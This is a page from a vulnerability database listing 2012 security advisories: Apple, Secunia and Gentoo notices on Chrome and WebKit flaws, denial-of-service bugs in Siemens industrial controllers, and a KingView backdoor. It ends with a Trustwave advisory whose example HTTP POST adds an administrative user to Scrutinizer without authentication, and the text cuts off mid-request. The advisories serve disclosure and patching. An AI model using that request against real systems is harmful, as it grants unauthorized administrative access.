VARIoT IoT vulnerabilities database
| VAR-201208-0339 | CVE-2012-2857 | Used in multiple products Webkit Service disruption in (DoS) Vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. This vulnerability Webkit Vulnerability in Google Chrome Other than Webkit Products that use may also be affected.Denial of service operations through crafted documents by third parties (DoS) There is a possibility of being affected unspecified, such as being in a state. Google Chrome is prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.
Versions prior to Chrome 21.0.1180.57 and 21.0.1180.60 are vulnerable. Google Chrome is a web browser developed by Google (Google).
CVE-ID
CVE-2013-0962 : Mario Heiderich of Cure53
For OS X Lion systems Safari 6.0.3 is available via
the Apple Software Update application.
For OS X Mountain Lion systems Safari 6.0.3 is included with
OS X v10.8.3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-01-28-1 iOS 6.1 Software Update
iOS 6.1 Software Update is now available and addresses the following:
Identity Services
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Authentication relying on certificate-based Apple ID
authentication may be bypassed
Description: An error handling issue existed in Identity Services.
If the user's AppleID certificate failed to validate, the user's
AppleID was assumed to be the empty string. If multiple systems
belonging to different users enter this state, applications relying
on this identity determination may erroneously extend trust. This
issue was addressed by ensuring that NULL is returned instead of an
empty string.
CVE-ID
CVE-2013-0963
International Components for Unicode
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A canonicalization issue existed in the handling of the
EUC-JP encoding, which could lead to a cross-site scripting attack on
EUC-JP encoded websites. This issue was addressed by updating the
EUC-JP mapping table.
CVE-ID
CVE-2011-3058 : Masato Kinugawa
Kernel
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: A user-mode process may be able to access the first page of
kernel memory
Description: The iOS kernel has checks to validate that the user-
mode pointer and length passed to the copyin and copyout functions
would not result in a user-mode process being able to directly access
kernel memory. The checks were not being used if the length was
smaller than one page. This issue was addressed through additional
validation of the arguments to copyin and copyout.
CVE-ID
CVE-2013-0964 : Mark Dowd of Azimuth Security
Security
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: Several intermediate CA certificates were mistakenly
issued by TURKTRUST. This may allow a man-in-the-middle attacker to
redirect connections and intercept user credentials or other
sensitive information. This issue was addressed by not allowing the
incorrect SSL certificates.
StoreKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: JavaScript may be enabled in Mobile Safari without user
interaction
Description: If a user disabled JavaScript in Safari Preferences,
visiting a site which displayed a Smart App Banner would re-enable
JavaScript without warning the user. This issue was addressed by not
enabling JavaScript when visiting a site with a Smart App Banner.
CVE-ID
CVE-2013-0974 : Andrew Plotkin of Zarfhome Software Consulting, Ben
Madison of BitCloud, Marek Durcek
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2012-2824 : miaubiz
CVE-2012-2857 : Arthur Gerkis
CVE-2012-3606 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3607 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3632 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3687 : kuzzcc
CVE-2012-3701 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0948 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0949 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0950 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0951 : Apple
CVE-2013-0952 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0953 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0954 : Dominic Cooney of Google and Martin Barbella of the
Google Chrome Security Team
CVE-2013-0955 : Apple
CVE-2013-0956 : Apple Product Security
CVE-2013-0958 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0959 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0968 : Aaron Nelson
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Copying and pasting content on a malicious website may lead
to a cross-site scripting attack
Description: A cross-site scripting issue existed in the handling of
content pasted from a different origin. This issue was addressed
through additional validation of pasted content.
CVE-ID
CVE-2013-0962 : Mario Heiderich of Cure53
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
frame elements. This issue was addressed through improved origin
tracking.
CVE-ID
CVE-2012-2889 : Sergey Glazunov
WiFi
Available for: iPhone 3GS, iPhone 4, iPod touch (4th generation),
iPad 2
Impact: A remote attacker on the same WiFi network may be able to
temporarily disable WiFi
Description: An out of bounds read issue exists in Broadcom's
BCM4325 and BCM4329 firmware's handling of 802.11i information
elements. This issue was addressed through additional validation of
802.11i information elements.
CVE-ID
CVE-2012-2619 : Andres Blanco and Matias Eissler of Core Security
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "6.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRBffvAAoJEPefwLHPlZEwzYgP/0qhsTft9TUGuphoY9tth5WB
D0+8pAKs+1HU+nMOaEKPbK+zdMxblhRNPQyhMuTAQaY5Z/iGn1EXVCTlQBO8esRW
epxNZuhFoaW4wzK9kvw5d/HZ9tfq059ozlFOp1TI2D6J5RwNgxDfigt2PUKCTV4X
u/BONQHIfINYMofgf5897LHYYFSU2+NJj5ouM5dY4Y/kfJkwAnG5AWCAGlEt3QOo
MZdaVv3/itPj4te838FYCVAepel3xBWX0Hhuu87+waHslRrIfQl+EvNk3YZXxWiF
O5Hw9Ng/H8n0sbeA39w0U8tw+q/wPhVexdULgRjBH65+6g7Cu5u+rMuYuRjl8fO/
glLhKZNSrQDa5ZNOraOrF62AFVByHaSxv4cZwo262/6uH93FIBtklMt947GMVQLC
1FT0CIGNJb1/0156bvsABfRScBtK9ZdIUjXhOHMinhQJX3qiBqyKc4/juYPmC9VC
KXk2/K8b0sGWQRc5RuQsSpzkZF9WcrwmgGOBIghp2DLmbAAj0uh2Ttf1GdrOaajR
XpZ2TTJ5qE+IHNU0/etroTYnzjKVjQ0pODrPZj7ALLXULTraXJRJy7fqraUzsHbi
AZiRca+3x/S9nqV0NpTNPZgTwxenox10t0w5vhcBK+SPGga1oVRbtOjGtVIkgoG4
KI3sdgb6PtpZWuIJ6iZA
=J2jv
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50105
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50105/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50105
RELEASE DATE:
2012-08-01
DISCUSS ADVISORY:
http://secunia.com/advisories/50105/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50105/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50105
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Google Chrome, where
some have an unknown impact and others can be exploited by malicious
people to bypass certain security restrictions and compromise a
user's system.
1) An error when handling renders can be exploited to bypass the
cross-process policy and cause interference.
NOTE: This vulnerability affect the Linux platform only.
2) The application does not properly re-prompt the user when
downloading multiple files and can be exploited to trick the user
into downloading a malicious file.
3) An error when handling drag and drop events can be exploited to
access certain restricted files.
4) Multiple errors exist within the PDF viewer. No further
information is currently available.
5) Multiple integer overflow errors exist within the PDF viewer.
6) A use-after-free error exists when handling object linkage in
PDFs.
7) An error within the "webRequest" module can be exploited to cause
interference with the Chrome Web Store.
8) A use-after-free error exists within the PDF viewer.
9) An out-of-bounds write error exists within the PDF viewer.
10) A use-after-free error exits when handling CSS DOM objects.
11) An error within the WebP decoder can be exploited to cause a
buffer overflow.
12) An unspecified error exists within tab handling.
NOTE: This vulnerability affect the Linux platform only.
13) An out-of-bounds access error exists when clicking in date
picker.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Julien Tinnes, Google Chrome Security Team
2, 3) Matt Austin, Aspect Security
4, 5, 8, 9) Mateusz Jurczyk and Gynvael Coldwind, Google Security
Team
6) Alexey Samsonov, Google
7) Trev, Adblock
10) Arthur Gerkis
11) J\xfcri Aedla
12) Jeff Roberts, Google Security Team
13) Chamal de Silva
ORIGINAL ADVISORY:
googlechromereleases.blogspot.com/2012/07/stable-channel-release.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. In
certain contexts, an active network attacker could present untrusted
certificates to iTunes and they would be accepted without warning. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201208-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Chromium: Multiple vulnerabilities
Date: August 14, 2012
Bugs: #423719, #426204, #429174
ID: 201208-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been reported in Chromium, some of which
may allow execution of arbitrary code.
Background
==========
Chromium is an open source web browser project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/chromium < 21.0.1180.57 >= 21.0.1180.57
Description
===========
Multiple vulnerabilities have been discovered in Chromium. Please
review the CVE identifiers and release notes referenced below for
details.
Impact
======
A remote attacker could entice a user to open a specially crafted web
site using Chromium, possibly resulting in the execution of arbitrary
code with the privileges of the process, a Denial of Service condition,
disclosure of sensitive information, or other unspecified impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Chromium users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/chromium-21.0.1180.57"
References
==========
[ 1 ] CVE-2012-2815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2815
[ 2 ] CVE-2012-2817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2817
[ 3 ] CVE-2012-2818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2818
[ 4 ] CVE-2012-2819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2819
[ 5 ] CVE-2012-2820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2820
[ 6 ] CVE-2012-2821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2821
[ 7 ] CVE-2012-2823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2823
[ 8 ] CVE-2012-2824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2824
[ 9 ] CVE-2012-2825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2825
[ 10 ] CVE-2012-2826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2826
[ 11 ] CVE-2012-2829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2829
[ 12 ] CVE-2012-2830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2830
[ 13 ] CVE-2012-2831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2831
[ 14 ] CVE-2012-2834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2834
[ 15 ] CVE-2012-2842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2842
[ 16 ] CVE-2012-2843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2843
[ 17 ] CVE-2012-2846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2846
[ 18 ] CVE-2012-2847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2847
[ 19 ] CVE-2012-2848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2848
[ 20 ] CVE-2012-2849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2849
[ 21 ] CVE-2012-2853
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2853
[ 22 ] CVE-2012-2854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2854
[ 23 ] CVE-2012-2857
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2857
[ 24 ] CVE-2012-2858
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2858
[ 25 ] CVE-2012-2859
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2859
[ 26 ] CVE-2012-2860
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2860
[ 27 ] Release Notes 20.0.1132.43
http://googlechromereleases.blogspot.com/2012/06/stable-channel-update_26=
.html
[ 28 ] Release Notes 20.0.1132.57
http://googlechromereleases.blogspot.com/2012/07/stable-channel-update.ht=
ml
[ 29 ] Release Notes 21.0.1180.57
http://googlechromereleases.blogspot.com/2012/07/stable-channel-release.h=
tml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201208-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201208-0419 | CVE-2012-4178 | Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in spywall/includes/deptUploads_data.php in Symantec Web Gateway 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via the groupid parameter. Symantec Web Gateway is a Web security gateway hardware appliance. Attackers can exploit the vulnerability for SQL injection attacks to obtain database sensitive information or control applications.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more
| VAR-201207-0137 | CVE-2012-3016 | Siemens SIMATIC S7-400 PN CPU Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Siemens SIMATIC S7-400 PN CPU devices with firmware 6 before 6.0.3 allow remote attackers to cause a denial of service (defect-mode transition and service outage) via crafted ICMP packets. Siemens SIMATIC is an automation software in a single engineering environment. There is a security hole in SIEMENS SIMATIC S7-400. Since the Ethernet port on the SIMATIC S7-400 V6 receives a malformed IP packet, the device enters the Defect mode. The SIMATIC S7-400 V6 CPU defect mode locks the unit and therefore cannot be processed for process control. The attacker can exploit this vulnerability. Conduct a denial of service attack. SIEMENS SIMATIC S7-400 is prone to multiple denial-of-service vulnerabilities.
Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Siemens SIMATIC S7-400 Products ICMP Processing Denial of Service
Vulnerability
SECUNIA ADVISORY ID:
SA50115
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50115/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50115
RELEASE DATE:
2012-07-31
DISCUSS ADVISORY:
http://secunia.com/advisories/50115/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50115/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50115
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in some Siemens SIMATIC S7-400
products, which can be exploited by malicious people to cause a DoS
(Denial of Service).
The vulnerability is reported in firmware versions 6.0.1 and 6.0.2 in
the following products:
* CPU 412-2 PN (6ES7412-2EK06-0AB0)
* CPU 414-3 PN/DP (6ES7414-3EM06-0AB0)
* CPU 414F-3 PN/DP (6ES7414-3FM06-0AB0)
* CPU 416-3 PN/DP (6ES7416-3ES06-0AB0)
* CPU 416F-3 PN (6ES7416-3FS06-0AB0)
SOLUTION:
Update to firmware version 6.0.3 (please see the vendor's advisory
for more information).
PROVIDED AND/OR DISCOVERED BY:
The vendor credits ICS-CERT.
ORIGINAL ADVISORY:
SSA-589272:
http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-589272.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0713 | No CVE | SAP Netweaver Cross Site Scripting and Information Disclosure Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
SAP Netweaver is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SAP Netweaver 7.0 is vulnerable; other versions may also be affected.
| VAR-201210-0353 | CVE-2012-4899 |
WellinTech KingView Backdoor unauthorized access vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0292 |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
WellinTech KingView 6.5.3 and earlier uses a weak password-hashing algorithm, which makes it easier for local users to discover credentials by reading an unspecified file. KingView is a product for building a data information service platform for industrial automation. Wellintech KingView has a default authentication credential that an attacker could use to log in to the application for unauthorized access using this undocumented default user. WellinTech KingView is prone to an unauthorized-access vulnerability due to a backdoor in all versions of the application.
Attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks
| VAR-201207-0139 | CVE-2012-3018 |
ICONICS GENESIS32 and BizViz Vulnerable to access restrictions
Related entries in the VARIoT exploits database: VAR-E-201207-0679 |
CVSS V2: 4.4 CVSS V3: - Severity: MEDIUM |
The lockout-recovery feature in the Security Configurator component in ICONICS GENESIS32 9.22 and earlier and BizViz 9.22 and earlier uses an improper encryption algorithm for generation of an authentication code, which allows local users to bypass intended access restrictions and obtain administrative access by predicting a challenge response. GENESIS32/BizViz is a new generation of industrial control software developed by ICONICS. Iconics GENESIS32 and BizViz are prone to a local authentication-bypass vulnerability. Successful exploits may lead to other attacks.
Iconics GENESIS32 and BizViz versions 9.22 and prior are vulnerable. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
ICONICS GENESIS32 / BizViz Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA50116
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50116/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50116
RELEASE DATE:
2012-07-31
DISCUSS ADVISORY:
http://secunia.com/advisories/50116/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50116/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50116
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in ICONICS GENESIS32 and ICONICS
BizViz, which can be exploited by malicious, local users to gain
escalated privileges. This can be exploited to gain
administrative access by predicting a challenge response.
SOLUTION:
Apply patches. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dr. Wesley McGrew, Mississippi State University.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-212-01.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0138 | CVE-2012-3017 | Siemens SIMATIC S7-400 PN CPU Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Siemens SIMATIC S7-400 PN CPU devices with firmware 5.x allow remote attackers to cause a denial of service (defect-mode transition and service outage) via (1) malformed HTTP traffic or (2) malformed IP packets. Siemens SIMATIC is an automation software in a single engineering environment. There is a security hole in SIEMENS SIMATIC S7-400. Since the Ethernet port on the SIMATIC S7-400 V5 receives a malformed IP or HTTP message, the device enters the Defect mode. The SIMATIC S7-400 V5 CPU defect mode locks the unit, so process control processing cannot be performed and the attacker can use it. This vulnerability is a denial of service attack. SIEMENS SIMATIC S7-400 is prone to multiple denial-of-service vulnerabilities.
Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. Vulnerabilities exist in Siemens SIMATIC S7-400 PN CPU firmware device version 5.x
| VAR-201207-0526 | CVE-2012-2647 | Yahoo! Toolbar (for Chrome, Safari) vulnerable to toolbar alteration |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote attackers to modify the configured search URL, and intercept search terms, via a crafted web page. Yahoo! Toolbar (for Chrome, Safari) contains a vulnerability where the toolbar may be altered. Keita Haga of keitahaga.com reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.A remote attacker may alter the toolbar. As a result, keywords entered in the toolbar may be leaked to a third party. Toolbar is prone to a remote security vulnerability. Yahoo! Toolbar (Yahoo! Toolbar) is a web browser toolbar of Yahoo! (Yahoo!) that can be used on Microsoft IE and Mozilla Firefox. It supports custom toolbars, and can check emails and browse the weather anytime, anywhere Forecasts, news, and other information
| VAR-201207-0529 | CVE-2012-2627 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to creating or overwriting arbitrary files |
CVSS V2: 9.4 CVSS V3: - Severity: HIGH |
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
